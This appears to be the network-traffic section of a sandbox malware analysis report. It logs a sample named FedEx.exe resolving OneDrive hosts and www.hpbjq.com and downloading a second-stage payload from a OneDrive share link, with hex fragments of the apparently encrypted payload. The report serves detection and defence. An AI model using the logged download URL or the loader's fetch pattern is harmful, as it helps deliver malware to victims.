                                            May 13, 2022 17:19:06.932039976 CEST49785443192.168.2.513.107.43.12
                                            May 13, 2022 17:19:12.940753937 CEST49785443192.168.2.513.107.43.12
                                            May 13, 2022 17:19:12.940803051 CEST4434978513.107.43.12192.168.2.5

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 13, 2022 17:18:27.516752005 CEST5966153192.168.2.58.8.8.8
                                            May 13, 2022 17:18:28.954665899 CEST5727853192.168.2.58.8.8.8
                                            May 13, 2022 17:19:03.469163895 CEST6371253192.168.2.58.8.8.8
                                            May 13, 2022 17:19:04.480946064 CEST6065853192.168.2.58.8.8.8
                                            May 13, 2022 17:19:12.961467028 CEST5298253192.168.2.58.8.8.8
                                            May 13, 2022 17:19:14.211657047 CEST5735253192.168.2.58.8.8.8
                                            May 13, 2022 17:20:36.255429029 CEST5675453192.168.2.58.8.8.8
                                            May 13, 2022 17:20:36.538408041 CEST53567548.8.8.8192.168.2.5

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            May 13, 2022 17:18:27.516752005 CEST192.168.2.58.8.8.80xf3e0Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                            May 13, 2022 17:18:28.954665899 CEST192.168.2.58.8.8.80x2bc7Standard query (0)7psoug.db.files.1drv.comA (IP address)IN (0x0001)
                                            May 13, 2022 17:19:03.469163895 CEST192.168.2.58.8.8.80x8492Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                            May 13, 2022 17:19:04.480946064 CEST192.168.2.58.8.8.80x6b0eStandard query (0)7psoug.db.files.1drv.comA (IP address)IN (0x0001)
                                            May 13, 2022 17:19:12.961467028 CEST192.168.2.58.8.8.80x6d0fStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                            May 13, 2022 17:19:14.211657047 CEST192.168.2.58.8.8.80xdc6aStandard query (0)7psoug.db.files.1drv.comA (IP address)IN (0x0001)
                                            May 13, 2022 17:20:36.255429029 CEST192.168.2.58.8.8.80xc48aStandard query (0)www.hpbjq.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            May 13, 2022 17:18:27.537632942 CEST8.8.8.8192.168.2.50xf3e0No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                            May 13, 2022 17:18:27.537632942 CEST8.8.8.8192.168.2.50xf3e0No error (0)l-0004.l-dc-msedge.net13.107.43.13A (IP address)IN (0x0001)
                                            May 13, 2022 17:18:29.024435043 CEST8.8.8.8192.168.2.50x2bc7No error (0)7psoug.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                            May 13, 2022 17:18:29.024435043 CEST8.8.8.8192.168.2.50x2bc7No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                            May 13, 2022 17:18:29.024435043 CEST8.8.8.8192.168.2.50x2bc7No error (0)l-0003.l-dc-msedge.net13.107.43.12A (IP address)IN (0x0001)
                                            May 13, 2022 17:19:03.488738060 CEST8.8.8.8192.168.2.50x8492No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                            May 13, 2022 17:19:03.488738060 CEST8.8.8.8192.168.2.50x8492No error (0)l-0004.l-dc-msedge.net13.107.43.13A (IP address)IN (0x0001)
                                            May 13, 2022 17:19:04.527992964 CEST8.8.8.8192.168.2.50x6b0eNo error (0)7psoug.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                            May 13, 2022 17:19:04.527992964 CEST8.8.8.8192.168.2.50x6b0eNo error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                            May 13, 2022 17:19:04.527992964 CEST8.8.8.8192.168.2.50x6b0eNo error (0)l-0003.l-dc-msedge.net13.107.43.12A (IP address)IN (0x0001)
                                            May 13, 2022 17:19:12.980264902 CEST8.8.8.8192.168.2.50x6d0fNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                            May 13, 2022 17:19:14.285195112 CEST8.8.8.8192.168.2.50xdc6aNo error (0)7psoug.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                            May 13, 2022 17:19:14.285195112 CEST8.8.8.8192.168.2.50xdc6aNo error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                            May 13, 2022 17:20:36.538408041 CEST8.8.8.8192.168.2.50xc48aNo error (0)www.hpbjq.com165.3.110.226A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • onedrive.live.com
                                            • 7psoug.db.files.1drv.com

                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.54975313.107.43.13443C:\Users\user\Desktop\FedEx.exe
                                            TimestampkBytes transferredDirectionData
                                            2022-05-13 15:18:28 UTC0OUTGET /download??cid=020C1D97A63B8AD4&resid=20C1D97A63B8AD4%21155&authkey=ADj7CX_G1rJPDU4 HTTP/1.1
                                            User-Agent: lVali
                                            Host: onedrive.live.com
                                            2022-05-13 15:18:28 UTC0INHTTP/1.1 302 Found
                                            Cache-Control: no-cache, no-store
                                            Pragma: no-cache
                                            Content-Type: text/html
                                            Expires: -1
                                            Location: https://7psoug.db.files.1drv.com/y4mTnkLj40hyLVw4BtBaiXNAdGj9lmXPu8bnFu8Q62yCKBLlljWV9gQTwNCXadDaPBG7a5xsZQK5iQFq0oL78Muh1zAhj_-GEEmciX2xawq2j1_yCdrDwIN59eRGDziNd9B4VLik6wClT-AZqKljLWZnWxQ35HpD4NNz2-X026MmD9jZr5dj0h083QXOKwfNDAijB2b6l19b29hHg3LxktPSA/Rvsubentohcvaxlbphydsofhyldatal?download&psid=1
                                            Set-Cookie: E=P:c2oI1fM02og=:k6u1A444aq3bmDmo/mWTSqLlr2uZ2puo/iD5RFPbsfE=:F; domain=.live.com; path=/
                                            Set-Cookie: xid=09282da4-e147-4895-8781-e47f9fbefcca&&RD00155D3F4236&173; domain=.live.com; path=/
                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                            Set-Cookie: LD=; domain=.live.com; expires=Fri, 13-May-2022 13:38:28 GMT; path=/
                                            Set-Cookie: wla42=; domain=live.com; expires=Fri, 20-May-2022 15:18:28 GMT; path=/
                                            X-Content-Type-Options: nosniff
                                            Strict-Transport-Security: max-age=31536000
                                            X-MSNServer: RD00155D3F4236
                                            X-ODWebServer: northcentralus0-odwebpl
                                            X-Cache: CONFIG_NOCACHE
                                            X-MSEdge-Ref: Ref A: BC33A16F626E49BEB3CC8DBD0A3ED640 Ref B: VIEEDGE3011 Ref C: 2022-05-13T15:18:28Z
                                            Date: Fri, 13 May 2022 15:18:28 GMT
                                            Connection: close
                                            Content-Length: 0


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.54975413.107.43.12443C:\Users\user\Desktop\FedEx.exe
                                            TimestampkBytes transferredDirectionData
                                            2022-05-13 15:18:29 UTC1OUTGET /y4mTnkLj40hyLVw4BtBaiXNAdGj9lmXPu8bnFu8Q62yCKBLlljWV9gQTwNCXadDaPBG7a5xsZQK5iQFq0oL78Muh1zAhj_-GEEmciX2xawq2j1_yCdrDwIN59eRGDziNd9B4VLik6wClT-AZqKljLWZnWxQ35HpD4NNz2-X026MmD9jZr5dj0h083QXOKwfNDAijB2b6l19b29hHg3LxktPSA/Rvsubentohcvaxlbphydsofhyldatal?download&psid=1 HTTP/1.1
                                            User-Agent: lVali
                                            Host: 7psoug.db.files.1drv.com
                                            Connection: Keep-Alive
                                            2022-05-13 15:18:29 UTC1INHTTP/1.1 200 OK
                                            Cache-Control: public
                                            Content-Length: 341504
                                            Content-Type: application/octet-stream
                                            Content-Location: https://7psoug.db.files.1drv.com/y4mbREn9_V4vP2iayGOc8Ug-MJsNGUbQ22edGkOo763CxJa0LiZHDGiyIHL8PMA6_CPYVN_Lv92cQujNhxFM2-U78tasAwr1U85eFWqGUlWNjSUx0QfvHbwPe0puemPS190ZraHKjtWPpxYouaJrwNs6N1G3VLK2-hxHAM9ZfZysd9ak8uPjfD1rWJHsvG4Nzk2
                                            Expires: Thu, 11 Aug 2022 15:18:29 GMT
                                            Last-Modified: Thu, 12 May 2022 02:54:59 GMT
                                            Accept-Ranges: bytes
                                            ETag: 20C1D97A63B8AD4!155.2
                                            P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                            X-MSNSERVER: DB3PPF9FE06AB08
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                            MS-CV: CO+whBk7v0miQpMHGRJyMQ.0
                                            X-SqlDataOrigin: S
                                            CTag: aYzoyMEMxRDk3QTYzQjhBRDQhMTU1LjI1Nw
                                            X-PreAuthInfo: rv;poba;
                                            Content-Disposition: attachment; filename="Rvsubentohcvaxlbphydsofhyldatal"
                                            X-Content-Type-Options: nosniff
                                            X-StreamOrigin: X
                                            X-AsmVersion: UNKNOWN; 19.906.426.2003
                                            X-Cache: CONFIG_NOCACHE
                                            X-MSEdge-Ref: Ref A: C1C2D52966A640F68E0FD92DB76B862E Ref B: VIEEDGE2116 Ref C: 2022-05-13T15:18:29Z
                                            Date: Fri, 13 May 2022 15:18:29 GMT
                                            Connection: close
                                            2022-05-13 15:18:29 UTC2INData Raw: 87 20 56 c6 3d c6 c6 c6 ca c6 c6 c6 39 39 c6 c6 7e c6 c6 c6 c6 c6 c6 c6 06 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 3b c6 c6 d4 59 80 d4 c6 7a 43 07 5b 7e 3b 12 07 5b 1a 2e a3 ad e6 36 38 a9 a1 38 9b a7 e6 9d 9b 34 34 a9 3a e6 28 9f e6 38 af 34 e6 a3 34 e6 0a 89 8d e6 a7 a9 2a 9f f4 47 47 d0 ea c6 c6 c6 c6 c6 c6 c6 86 be 55 12 4a d3 af 59 4a d3 af 59 4a d3 af 59 e0 73 78 59 bf d3 af 59 88 8e 70 59 c9 d3 af 59 88 8e cf 59 2a d3 af 59 88 8e 5a 59 98 d3 af 59 c7 1b bc 59 48 d3 af 59 c7 1b b8 59 46 d3 af 59 c7 1b 37 59 bf d3 af 59 c7 1b ac 59 db d3 af 59 4a d3 3a 59 74 d5 af 59 33 a6 cf 59 4c d3 af 59 33 a6 5a 59 8a d3 af 59 c3 05 74 59 bf d3 af 59 33 a6 e5 59 bf d3 af 59 18 a3 9d 2e 4a d3 af
                                            Data Ascii: V=99~;YzC[~;[.68844:(844*GGUJYJYJYsxYYpYYY*YZYYYHYYFY7YYYYJ:YtY3YLY3ZYYtYY3YY.J
                                            2022-05-13 15:18:29 UTC6INData Raw: 08 ce c5 ca ea c5 06 ca c5 dc 63 08 d2 c5 cc bd 3e d2 c6 af d6 c5 cc ae 4c 33 39 39 25 41 c5 ca ea 6d 98 c3 d6 bd 8a de 97 99 24 95 fd 56 8d bd 8a ae c5 13 c7 4e 39 79 c6 c6 bb 1b c6 86 39 39 c3 d2 ea 3d 96 bb a8 c6 86 39 39 c3 1a ea ca c5 0a ea ca 75 ca ea 3c 99 c5 05 c5 1a ea ca 65 da ea c5 ca ea ae 57 37 39 39 c7 12 ea ce c5 0d 7e c2 9f 08 c6 ae 97 33 39 39 c5 22 ea ce bf 15 3a 59 c7 12 ea d6 c5 1a ea d2 c5 fd ae 34 35 39 39 c5 0a ea d6 c3 0a ea ce c5 0a ea da c3 0a ea d2 bd 42 ea ce c6 3a da c7 1a ea ce 7e c2 9f 08 c6 ae e3 33 39 39 25 ca 6d 86 c3 3d bd 8a de 95 fd c5 86 8f c5 b2 8b 6d 98 8f 2e 7e e2 06 c6 2a 39 f8 2a c3 e8 2e 92 9f 08 c6 ae 82 31 39 39 46 77 87 26 08 c6 c6 3a d0 2e 92 9f 08 c6 ae eb 31 39 39 7e b2 9f 08 c6 ae 7d be 39 39 7e c2 9f 08
                                            Data Ascii: c>L399%Am$VN9y99=99u<eW799~399":Y4599B:~399%m=m.~*9*.199Fw&:.199~}99~
                                            2022-05-13 15:18:29 UTC14INData Raw: 1a 30 41 30 3b 2e a4 c0 27 d4 18 39 5f da 26 08 c6 fd c5 0a ea f6 01 06 ca c5 75 06 c6 ae 72 63 c6 c6 c5 56 c6 c6 c6 c6 c5 d0 c3 4e c6 c6 c6 c6 c5 08 d2 bd 26 ca 37 bb fe a4 c0 27 d4 3a 47 c5 08 ce ae ad c0 39 39 ae 10 37 39 39 6b 86 bd 8a da 2a c5 d6 93 c5 d8 c3 4b 97 99 24 95 7e 3b c6 c6 c6 fd c7 06 c6 ae 9d 63 c6 c6 c5 56 c6 c6 c6 c6 c5 d0 c3 4e c6 c6 c6 c6 c5 08 ce ae 73 c0 39 39 20 c5 2a ea f2 6b 86 93 2a c3 ce 1e 97 ae f1 37 39 39 39 a8 fd 6b 98 c5 12 ea ce c5 0a ea ca bd fb 3f 2a c3 c8 39 0b 88 d2 c6 fd c5 86 8f c5 b2 c5 8f ce c5 c8 77 58 c6 c6 86 b9 f2 3a 22 77 54 c6 c6 86 b9 4f 3a 91 67 3f c6 c6 86 3a 22 67 c1 c6 c6 c6 3a 77 0e 3a 14 25 26 3f ab 39 39 79 bd ae c8 38 fc 3a f6 25 18 77 5c c6 c6 86 b9 4b 3a 77 67 cd c6 c6 86 3a f4 0e 3a 4d 0e 3a ea
                                            Data Ascii: 0A0;.'9_&urcVN&7':G99799k*K$~;cVNs99 *k*7999k?*9wX:"wTO:g?:"g:w:%&?99y8:%w\K:wg::M:


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.54976013.107.43.13443C:\Users\user\Desktop\FedEx.exe
                                            TimestampkBytes transferredDirectionData
                                            2022-05-13 15:18:29 UTC22OUTGET /download??cid=020C1D97A63B8AD4&resid=20C1D97A63B8AD4%21155&authkey=ADj7CX_G1rJPDU4 HTTP/1.1
                                            User-Agent: 44
                                            Host: onedrive.live.com
                                            Cache-Control: no-cache
                                            Cookie: E=P:c2oI1fM02og=:k6u1A444aq3bmDmo/mWTSqLlr2uZ2puo/iD5RFPbsfE=:F; xid=09282da4-e147-4895-8781-e47f9fbefcca&&RD00155D3F4236&173; xidseq=1; wla42=
                                            2022-05-13 15:18:30 UTC22INHTTP/1.1 302 Found
                                            Cache-Control: no-cache, no-store
                                            Pragma: no-cache
                                            Content-Type: text/html
                                            Expires: -1
                                            Location: https://7psoug.db.files.1drv.com/y4ml7-AIKSVvhdNF4oTlWE27Sg2xfN1VXI-zQgD_S8pdj84xCMmYdG5QewqUmSM7ppL4ErfY5FQN7yQ5e8Er7wNoethZZPpye0v7-OBK4AhUUqHfyyPL2MArqnagRFrgHcjasodUbnSfipUTgA205VKAkM6jdwj-Gik53gySQuJl4UaH9ZZ7bt5lPVcB0d0zfIP24kcbexngfNA4ODS-TihkA/Rvsubentohcvaxlbphydsofhyldatal?download&psid=1
                                            Set-Cookie: E=P:ec4j1vM02og=:aTs2d35dg7rx5WLT2PUZIPV+r9V3JYnmgHYtolcQ0BQ=:F; domain=.live.com; path=/
                                            Set-Cookie: xidseq=2; domain=.live.com; path=/
                                            Set-Cookie: LD=; domain=.live.com; expires=Fri, 13-May-2022 13:38:30 GMT; path=/
                                            Set-Cookie: wla42=; domain=live.com; expires=Fri, 20-May-2022 15:18:30 GMT; path=/
                                            X-Content-Type-Options: nosniff
                                            Strict-Transport-Security: max-age=31536000
                                            X-MSNServer: RD00155D3F4237
                                            X-ODWebServer: northcentralus0-odwebpl
                                            X-Cache: CONFIG_NOCACHE
                                            X-MSEdge-Ref: Ref A: 048176C0B46D48818277CD6CCB4DFD60 Ref B: VIEEDGE2909 Ref C: 2022-05-13T15:18:30Z
                                            Date: Fri, 13 May 2022 15:18:30 GMT
                                            Connection: close
                                            Content-Length: 0


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.54976813.107.43.12443C:\Users\user\Desktop\FedEx.exe
                                            TimestampkBytes transferredDirectionData
                                            2022-05-13 15:18:30 UTC23OUTGET /y4ml7-AIKSVvhdNF4oTlWE27Sg2xfN1VXI-zQgD_S8pdj84xCMmYdG5QewqUmSM7ppL4ErfY5FQN7yQ5e8Er7wNoethZZPpye0v7-OBK4AhUUqHfyyPL2MArqnagRFrgHcjasodUbnSfipUTgA205VKAkM6jdwj-Gik53gySQuJl4UaH9ZZ7bt5lPVcB0d0zfIP24kcbexngfNA4ODS-TihkA/Rvsubentohcvaxlbphydsofhyldatal?download&psid=1 HTTP/1.1
                                            User-Agent: 44
                                            Cache-Control: no-cache
                                            Host: 7psoug.db.files.1drv.com
                                            Connection: Keep-Alive
                                            2022-05-13 15:18:32 UTC24INHTTP/1.1 200 OK
                                            Cache-Control: public
                                            Content-Length: 341504
                                            Content-Type: application/octet-stream
                                            Content-Location: https://7psoug.db.files.1drv.com/y4mbREn9_V4vP2iayGOc8Ug-MJsNGUbQ22edGkOo763CxJa0LiZHDGiyIHL8PMA6_CPYVN_Lv92cQujNhxFM2-U78tasAwr1U85eFWqGUlWNjSUx0QfvHbwPe0puemPS190ZraHKjtWPpxYouaJrwNs6N1G3VLK2-hxHAM9ZfZysd9ak8uPjfD1rWJHsvG4Nzk2
                                            Expires: Thu, 11 Aug 2022 15:18:32 GMT
                                            Last-Modified: Thu, 12 May 2022 02:54:59 GMT
                                            Accept-Ranges: bytes
                                            ETag: 20C1D97A63B8AD4!155.2
                                            P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                            X-MSNSERVER: DB3PPF310CA15F7
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                            MS-CV: Gb1ohj7vKUCFt4vx1uZj2g.0
                                            X-SqlDataOrigin: S
                                            CTag: aYzoyMEMxRDk3QTYzQjhBRDQhMTU1LjI1Nw
                                            X-PreAuthInfo: rv;poba;
                                            Content-Disposition: attachment; filename="Rvsubentohcvaxlbphydsofhyldatal"
                                            X-Content-Type-Options: nosniff
                                            X-StreamOrigin: X
                                            X-AsmVersion: UNKNOWN; 19.906.426.2003
                                            X-Cache: CONFIG_NOCACHE
                                            X-MSEdge-Ref: Ref A: BAD273EDB6BC4C83B1984CB04A71CB15 Ref B: VIEEDGE1314 Ref C: 2022-05-13T15:18:30Z
                                            Date: Fri, 13 May 2022 15:18:31 GMT
                                            Connection: close
                                            2022-05-13 15:18:32 UTC25INData Raw: 87 20 56 c6 3d c6 c6 c6 ca c6 c6 c6 39 39 c6 c6 7e c6 c6 c6 c6 c6 c6 c6 06 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 3b c6 c6 d4 59 80 d4 c6 7a 43 07 5b 7e 3b 12 07 5b 1a 2e a3 ad e6 36 38 a9 a1 38 9b a7 e6 9d 9b 34 34 a9 3a e6 28 9f e6 38 af 34 e6 a3 34 e6 0a 89 8d e6 a7 a9 2a 9f f4 47 47 d0 ea c6 c6 c6 c6 c6 c6 c6 86 be 55 12 4a d3 af 59 4a d3 af 59 4a d3 af 59 e0 73 78 59 bf d3 af 59 88 8e 70 59 c9 d3 af 59 88 8e cf 59 2a d3 af 59 88 8e 5a 59 98 d3 af 59 c7 1b bc 59 48 d3 af 59 c7 1b b8 59 46 d3 af 59 c7 1b 37 59 bf d3 af 59 c7 1b ac 59 db d3 af 59 4a d3 3a 59 74 d5 af 59 33 a6 cf 59 4c d3 af 59 33 a6 5a 59 8a d3 af 59 c3 05 74 59 bf d3 af 59 33 a6 e5 59 bf d3 af 59 18 a3 9d 2e 4a d3 af
                                            Data Ascii: V=99~;YzC[~;[.68844:(844*GGUJYJYJYsxYYpYYY*YZYYYHYYFY7YYYYJ:YtY3YLY3ZYYtYY3YY.J
                                            2022-05-13 15:18:32 UTC28INData Raw: 7d ca db b2 9f 08 c6 c3 41 25 95 c5 41 c5 06 ce c3 cc c5 41 c5 06 d2 3d cc c3 7f c6 c5 cc 75 0a ea d6 ad cc c5 0a ea d6 c3 cc c5 7f c6 75 0a ea da 3c 41 c5 0a ea da c3 7f c6 c5 cc 75 7f c6 ad 59 30 ca 2e c6 d6 c6 c6 c5 7f c6 65 cc 16 c5 cc 16 ae ec 35 39 39 bf 86 af cc 6d 86 c3 3d 25 49 c5 41 c5 c6 c3 41 7e b2 9f 08 c6 75 41 af 62 bd 8a de 97 99 24 95 fd 56 8d 1c 91 8f bd 8a ae c3 da ea c7 3a ea ce c7 42 ea ca c7 22 ea d2 c5 96 c5 b0 bb ff 39 49 c6 c6 bb 1f c6 b6 39 39 c3 32 ea d6 3d da ea bb a8 c6 b6 39 39 c3 1a ea da c5 0a ea d6 c3 3b c5 0a ea da 65 0a ea d6 c3 7b ca db b2 9f 08 c6 c3 41 25 1e c5 41 c5 06 ce c3 cc c5 41 c5 06 d2 3d cc c3 3d c5 cc 75 0a ea d6 ad cc c5 0a ea d6 c3 cc c5 3d 75 0a ea da 3c cc c5 0a ea da c3 3d c5 cc 75 3d ad e6 2e c6 06 c6
                                            Data Ascii: }A%AA=uu<AuY0.e599m=%IAA~uAb$V:B"9I992=99;e{A%AA==u=u<=u=.
                                            2022-05-13 15:18:32 UTC36INData Raw: 1e 3a 3f c3 2b 24 39 1b 24 c5 ce 39 9b b6 fd 56 18 8b 8d 4a 98 42 3d 39 16 ba 6b 98 c7 12 ea d6 2a c5 e0 c3 53 c3 a3 ce 01 7b ca af fe 06 c6 c3 7b d2 2a c3 d0 95 93 20 fd 23 00 3b c6 c6 c5 0a ea f2 c5 06 d2 bf 86 3a d4 c5 ce 78 bb 16 39 8b c2 1e ae 43 c6 c6 c6 ae 6e c8 c6 c6 fd c7 06 c6 c5 d6 39 18 be fd c5 86 8d c5 9e c5 fd c5 d6 39 18 aa c5 fd 95 fd c5 86 4a 98 b9 3b fd 16 18 c5 d6 39 18 ae 20 1e fd 56 46 77 ee 06 08 c6 3b 3c 4b 30 c6 30 c6 30 c6 2e 19 c0 27 d4 39 4f da 26 08 c6 fd 56 46 77 ee 06 08 c6 c6 3a 51 16 16 18 1a 30 c8 30 c6 2e aa c0 27 d4 39 4f da 26 08 c6 bd 8a ce 1e fd c7 06 c6 1a 30 3b 30 c6 2e a6 c0 27 d4 39 4f da 26 08 c6 bd 8a ca 1e fd c7 06 c6 46 77 ee 06 08 c6 3b 3c 41 16 8d 23 9e 39 39 39 fd c7 06 c6 bf 03 3a 53 c5 7b 3b 46 73 23 3a
                                            Data Ascii: :?+$9$9VJB=9k*S{{* #;:x9Cn99J;9 VFw;<K000.'9O&VFw:Q00.'9O&0;0.'9O&Fw;<A#999:S{;Fs#:
                                            2022-05-13 15:18:32 UTC44INData Raw: 16 ae 28 80 39 39 c5 b6 bd c4 39 3a b5 1c ae 87 80 39 39 c7 bf 9c c4 39 39 16 ae e3 80 39 39 c7 8d 3b 3d 88 06 77 3f 3b c6 c6 b9 22 8c 4a 57 df 37 39 39 22 7e 3f 3b c6 c6 65 fd 0e 16 c7 bf 9c c4 39 39 16 c7 bf df 37 39 39 3d fd 06 16 ae a7 80 39 39 c7 bf 9c c4 39 39 16 ae a3 80 39 39 06 3d 9e c5 7f b2 c3 7f b6 c5 7f b6 46 fe c6 49 bf 83 39 39 39 c5 7f be 16 c7 bf df 37 39 39 16 c5 7f c2 16 ae fe 80 39 39 c5 7f ba 99 24 95 c5 1f 97 fd c6 c6 a5 9f 38 34 9f 32 6d f8 f4 2a 32 32 c6 c6 c6 c6 81 9f 3a 12 a9 34 a1 16 9b 3a 2e 14 9b a7 9f 7b c6 c6 c6 c6 8f c5 b2 bb 8a a2 c4 39 39 8d c3 7f c2 2e 3f 3b c6 c6 c7 bf 19 c4 39 39 16 30 c6 ae 76 f3 39 39 8c 7f b4 c6 c7 7f be 16 2e 53 c6 49 c6 30 c6 2e fe 95 06 c6 2e 3b c6 c6 46 ae b0 f3 39 39 bf 86 3a 06 c7 7f be 16 2e
                                            Data Ascii: (999:999999;=w?;"JW799"~?;e99799=999999=FI99979999$842m*22:4:.{99.?;990v99.SI0..;F99:.
                                            2022-05-13 15:18:32 UTC52INData Raw: f6 ad 06 c6 d6 fe 06 c6 e2 fe 06 c6 e6 fe 06 c6 ea fe 06 c6 de fe 06 c6 46 6f 06 c6 c6 80 06 c6 9e 6f 06 c6 49 7f 83 34 3c 9b 32 a3 2a 16 a9 a3 34 3a 9f 38 82 3e 06 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 82 3e 06 c6 d2 c6 c6 c6 8e 38 06 c6 d6 fe 06 c6 e2 fe 06 c6 e6 fe 06 c6 ea fe 06 c6 de fe 06 c6 46 6f 06 c6 62 6f 06 c6 9e 6f 06 c6 d2 7f 83 34 3c 9b 32 a3 2a 7d 9b ad 3a c7 06 c6 de b3 06 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 de b3 06 c6 d2 c6 c6 c6 8e 38 06 c6 d6 fe 06 c6 e2 fe 06 c6 e6 fe 06 c6 ea fe 06 c6 de fe 06 c6 46 6f 06 c6 62 6f 06 c6 9e 6f 06 c6 47 7f 7d a9 34 3c 9f 38 3a 7f 38 38 a9 38 c5 86 3a b3 06 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6 c6
                                            Data Ascii: FooI4<2*4:8>>8Foboo4<2*}:8FobooG}4<8:888:
                                            2022-05-13 15:18:32 UTC60INData Raw: 13 c5 fd 84 2a c6 c6 c6 6d 98 31 bc bf 98 af da c5 fd f3 56 3b c6 c6 6d 98 31 2b bf 98 3a 3f 6d 86 24 95 fd 76 3b 24 95 fd c7 06 c6 8f c5 b2 bd 8a ba 8d 1c 91 c5 13 c5 c0 c5 b6 8c 7f 39 c6 c5 8c ae 70 39 39 39 bd a6 b9 c7 ca 06 c7 ca ff ae 06 08 c6 c3 7f be 2c bd c4 3b 49 48 54 c6 c6 c6 2c bb c4 49 61 49 c1 bd c6 c6 c6 2c bd 39 3b 38 b7 2c bd 39 d2 b1 b1 2c bd 35 3b 38 ab 49 f1 01 c5 8f be 2c 75 22 08 c4 b1 2a 49 f1 01 0e bf 86 44 4b f3 3b c6 c6 c6 c5 8f be 2c 3d 22 10 c4 7b 0e af ba 49 f1 94 83 c5 fb 84 2a c6 c6 c6 d3 31 c4 a3 2b a7 3b c6 c6 c5 0b bf 98 b3 3d bd 88 3d fb c0 c8 3d b8 65 b6 c5 fb f3 56 3b c6 c6 d3 31 33 3d b6 49 f1 fd 3d b6 bb b4 20 cf d0 c6 c3 af ba 15 7f ba c5 7f ce 17 de d5 8c 7f 39 3b 50 7f 39 99 24 95 c5 1f 97 88 ca c6 c5 86 8d 1c 91
                                            Data Ascii: *m1V;m1+:?m$v;$9p999,;IHT,IaI,9;8,9,5;8I,u"*IDK;,="{I*1+;===eV;13=I= 9;P9$
                                            2022-05-13 15:18:32 UTC68INData Raw: 2b c5 a0 c5 be c7 81 ca c5 9c ae c7 c3 39 39 c5 01 4a 15 3a 49 ae 14 46 39 39 2a c9 3f c6 c6 c6 c6 bd 8a d2 c5 01 99 24 95 fd c5 86 8f c5 b2 30 c6 8d 1c 91 4a 98 3a ce bd 8a b6 ae 96 b9 39 39 c5 2b c5 a0 c5 be 6d 86 8f 2e 88 7e 06 c6 2a 39 f6 2a c3 e6 c7 7f c2 16 c5 8f d2 c5 87 ce c5 8c ae dd 0f 39 39 c5 8f c2 c7 81 ca ae f2 c3 39 39 6d 86 20 93 93 2a c3 d6 2e 03 7e 06 c6 c7 7f c2 ae fd 4e 39 39 fd 23 53 48 39 39 25 b6 c5 01 4a 15 3a 49 ae 96 b9 39 39 2a c9 3f c6 c6 c6 c6 bd 8a d2 c5 01 99 24 95 93 97 88 ce c6 8d 1c 91 4a 98 3a ce bd 8a b6 ae 8f b9 39 39 c5 2b c5 a0 c5 be c7 91 ca c5 8c ae 17 6e 39 39 c5 01 4a 15 3a 49 ae 58 b9 39 39 2a c9 3f c6 c6 c6 c6 bd 8a d2 c5 01 99 24 95 fd c5 86 8f c5 b2 30 c6 30 c6 8d 1c 91 4a 98 3a ce bd 8a b6 ae d8 b9 39 39 c5
                                            Data Ascii: +99J:IF99*?$0J:99+m.~*9*9999m *.~N99#SH99%J:I99*?$J:99+n99J:IX99*?$00J:99
